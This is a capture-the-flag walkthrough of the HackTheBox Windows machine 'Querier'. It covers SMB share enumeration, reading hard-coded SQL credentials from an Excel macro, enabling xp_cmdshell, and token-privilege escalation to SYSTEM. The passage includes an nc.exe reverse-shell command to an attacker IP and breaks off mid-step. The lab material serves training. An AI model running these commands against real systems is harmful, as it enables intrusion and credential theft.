Querier is a medium difficulty Windows box which has an Excel spreadsheet in a world-readable file share. The spreadsheet has macros, which connect to MSSQL server running on the box. The SQL server can be used to request a file through which NetNTLMv2 hashes can be leaked and cracked to recover the plaintext password. After logging in, PowerUp can be used to find Administrator credentials in a locally cached group policy file.
Enumeration
Scope
IP Address: 10.10.10.125
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
1433/tcp open ms-sql-s syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ nmap -p135,139,445,1433,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
|_ssl-date: 2024-07-11T13:38:17+00:00; +7s from scanner time.
| ms-sql-ntlm-info:
| 10.10.10.125:1433:
| Target_Name: HTB
| NetBIOS_Domain_Name: HTB
| NetBIOS_Computer_Name: QUERIER
| DNS_Domain_Name: HTB.LOCAL
| DNS_Computer_Name: QUERIER.HTB.LOCAL
| DNS_Tree_Name: HTB.LOCAL
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-11T13:34:28
|_Not valid after: 2054-07-11T13:34:28
| ms-sql-info:
| 10.10.10.125:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-07-11T13:38:13
|_ start_date: N/A
|_clock-skew: mean: 6s, deviation: 0s, median: 6s
* Open ports: 135,139,445,1433,5985
* Services: RPC - SMB - MSSQL - winRM
* Versions: Microsoft SQL Server 2017
* Important Notes: QUERIER.HTB.LOCAL
RPC Enumeration
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rpcclient -U "%" $ip
rpcclient $> enumdomusers
do_cmd: Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> srvinfo
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
SMB Enumeration
smbclient managed to get results but CME failed, The share Reports is not standard share, So let's explore it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ smbclient -N -L //$ip
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Reports Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.125 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ crackmapexec smb $ip -u '' -p '' --shares
SMB 10.10.10.125 445 QUERIER [+] HTB.LOCAL\:
SMB 10.10.10.125 445 QUERIER [-] Error enumerating shares: STATUS_ACCESS_DENIED
I mount the share to my kali machine to explore it easily
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ sudo mount -t cifs "\\\\$ip\\Reports" ./mount
Password for root@\\10.10.10.125\Reports:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ ls mount
'Currency Volume Report.xlsm'
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ file mount/Currency\ Volume\ Report.xlsm
mount/Currency Volume Report.xlsm: Microsoft Excel 2007+
Initial Access
Shell as reporting
I searched online for this file extension, and I found that It's Excel file macros enabled which contain visual basic script
I searched for a tool that can extract the script from xslm file and a found this one:
The macros script simply has a connection string to connect to database and execute some SQL query
Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open
So, the credentials are reporting:PcwTWTHRwryjc$c6, Let's connect to mssql database
I want to execute system command with xp_cmdshell but I need to enable it first
SQL (QUERIER\mssql-svc dbo@volume)> EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE
[*] INFO(QUERIER): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(QUERIER): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
The service account mssql-svc often has SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege privileges which can be used to escalate to SYSTEM account
SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "whoami /priv"
output
--------------------------------------------------------------------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
We can use RoguePotato or PrintSpoofer tools and nc.exe to execute this attack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49680
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
42be413e54f4658662xxxxxxxxxxxxxx
Root Flag: 42be413e54f4658662xxxxxxxxxxxxxx
Path2
Get a shell to easily explore the system for possible escalation paths
SQL (QUERIER\mssql-svc dbo@volume)> xp_cmdshell "C:\Users\mssql-svc\nc.exe 10.10.16.3 443 -e PowerShell"
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Queier]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.125] 49681
PS C:\Windows\system32>
Download PowerUp.ps1 which search for misconfigurations and weaknesses on the system